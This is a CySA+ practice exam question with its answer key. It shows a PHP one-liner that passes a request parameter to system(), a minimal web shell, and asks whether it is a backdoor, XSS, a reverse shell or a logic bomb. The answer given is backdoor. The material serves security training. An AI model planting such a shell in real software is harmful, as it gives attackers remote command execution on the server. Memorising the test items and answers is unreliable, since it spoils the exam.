CompTIA CySA+ (CS0-003) — Question 266

An analyst has discovered the following suspicious command:

php if(isset($_REQUEST['xyz'])){echo "<pre"; $xyz = ($_REQUEST['xyz']); system($xyz); echo ""; die; }?>

Which of the following would best describe the outcome of the command?

Answer options

• A. Cross-site scripting
• B. Reverse shell
• C. Backdoor attempt
• D. Logic bomb

Correct answer: C

Explanation

The command allows execution of arbitrary system commands via user input, which is characteristic of a backdoor attempt. While cross-site scripting, reverse shells, and logic bombs have their own specific definitions, they do not accurately describe the command's functionality in this context.